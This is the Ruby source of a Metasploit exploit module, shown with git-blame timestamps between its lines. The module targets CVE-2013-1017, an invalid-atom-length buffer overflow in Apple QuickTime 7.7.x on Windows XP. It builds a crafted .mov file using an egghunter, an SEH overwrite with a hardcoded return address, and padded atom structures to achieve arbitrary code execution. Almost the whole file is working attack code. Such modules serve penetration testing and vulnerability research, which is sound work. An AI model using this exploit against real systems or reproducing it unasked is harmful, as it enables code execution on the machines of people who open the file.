metasploit-framework/modules/exploits/windows/fileformat/apple_quicktime_rdrf.rb

141 lines
4.8 KiB
Ruby
Raw Normal View History

##
2017-07-24 13:26:21 +00:00
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
2016-03-08 13:02:44 +00:00
class MetasploitModule < Msf::Exploit::Remote
2013-08-30 21:28:54 +00:00
Rank = NormalRanking
2013-08-30 21:28:54 +00:00
include Msf::Exploit::FILEFORMAT
include Msf::Exploit::Egghunter
2013-08-30 21:28:54 +00:00
def initialize(info={})
super(update_info(info,
'Name' => "Apple Quicktime 7 Invalid Atom Length Buffer Overflow",
'Description' => %q{
2017-09-14 02:03:34 +00:00
This module exploits a vulnerability found in Apple QuickTime. The flaw is
triggered when QuickTime fails to properly handle the data length for certain
2013-08-30 21:28:54 +00:00
atoms such as 'rdrf' or 'dref' in the Alis record, which may result a buffer
overflow by loading a specially crafted .mov file, and allows arbitrary
code execution under the context of the current user. Please note: Since an egghunter
is used to search for the payload, this may require additional time for
the exploit to complete.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Jason Kratzer', # Original Discovery & PoC (overlapped finding), aka pyoor
'Tom Gallagher', # Original Discovery (overlapped)
'Paul Bates', # Original Discovery (overlapped)
'sinn3r' # Metasploit
],
'References' =>
[
[ 'CVE', '2013-1017' ],
[ 'OSVDB', '93625' ],
2013-08-30 21:28:54 +00:00
[ 'BID', '60097' ],
[ 'URL', 'http://support.apple.com/kb/HT5770' ],
[ 'ZDI', '13-110' ]
2013-08-30 21:28:54 +00:00
],
'Platform' => 'win',
'Targets' =>
[
# Ret = P/P/R in Quicktime.qtx
# Tested on:
# Quicktime 7.7.0
# Quicktime 7.7.1
# Quicktime 7.7.2
# Quicktime 7.7.3
[ 'Quicktime 7.7.0 - 7.7.3 on Windows XP SP3', {'Ret' => 0x66801042 } ]
],
'Payload' =>
{
'BadChars' => "\x00"
},
'Privileged' => false,
'DisclosureDate' => "May 22 2013",
'DefaultTarget' => 0
))
2013-08-30 21:28:54 +00:00
register_options(
[
OptString.new('FILENAME', [ true, 'The file name.', 'msf.mov']),
])
2013-08-30 21:28:54 +00:00
end
2013-08-30 21:28:54 +00:00
def sort_bytes(data)
buf = ''
0.step(data.length, 2) do |i|
buf << data[i, 2].reverse
end
2013-08-30 21:28:54 +00:00
buf
end
2013-08-30 21:28:54 +00:00
def exploit
fsize = 0
2013-08-30 21:28:54 +00:00
badchars = payload_badchars
hunter,egg = generate_egghunter(payload.encoded,badchars,{:checksum=>true})
2013-08-30 21:28:54 +00:00
buf = ''
buf << "\x61" * 5 # Make sure our NOPs don't cause AV
buf << sort_bytes(make_nops(4)) # Pad 9 bytes to ensure alignment
buf << sort_bytes(hunter) # egg huntin'
buf << rand_text_alpha(607 - buf.length) # Offset 607 to nSEH
buf << sort_bytes("\xeb\x06#{rand_text_alpha(2)}") # nSEH
buf << sort_bytes([target.ret].pack("V*")) # SE Handler
buf << sort_bytes("\xe9\x95\xfd\xff\xff\xff") # Jmp to egghunter
buf << rand_text_alpha(50) # After SEH, only ~33 bytes
buf << egg # Should be found somewhere else
2013-08-30 21:28:54 +00:00
# Quicktime File Format Specifications:
# https://developer.apple.com/standards/qtff-2001.pdf
mov = "\x00\x00\x06\xDF" # File size
mov << "moov" # Movie atom
mov << "\x00\x00\x06\xD7" # size (1751d)
mov << "rmra" # Reference Movie atom
mov << "\x00\x00\x06\xCF" # size (1743d)
mov << "rmda" # rmda atom
mov << "\x00\x00\x06\xBF" # size (1727d)
mov << "rdrf" # Data reference atom
mov << "\x00\x00\x00\x00" # size set to 0
mov << "alis" # Data reference type: FS alias record
mov << "\x00\x00\x06\xAA" # Size (1706d)
mov << rand_text_alpha(8)
mov << "\x00\x00\x06\x61" # Size (1633d)
mov << rand_text_alpha(38)
mov << "\x12"
mov << rand_text_alpha(81)
mov << "\xFF\xFF"
mov << rand_text_alpha(18)
mov << "\x00\x08" # Size (8d)
mov << rand_text_alpha(8)
mov << "\x00\x00"
mov << "\x00\x08" # Size (8d)
mov << rand_text_alpha(8)
mov << "\x00\x00"
mov << "\x00\x26" # Size (38d)
mov << rand_text_alpha(38)
mov << "\x00\x0F\x00\x0E"
mov << "AA" # Size (must be invalid)
mov << rand_text_alpha(12)
mov << "\x00\x12\x00\x21"
mov << rand_text_alpha(36)
mov << "\x00"
mov << "\x0F\x33"
mov << rand_text_alpha(17)
mov << "\x02\xF4" # Size (756h)
mov << rand_text_alpha(756)
mov << "\xFF\xFF\x00\x00\x00"
fsize += mov.length
mov << buf
fsize += buf.length
2013-08-30 21:28:54 +00:00
mov[0,4] = [fsize].pack("N")
2013-08-30 21:28:54 +00:00
print_status("Creating #{datastore['FILENAME']}")
file_create(mov)
end
end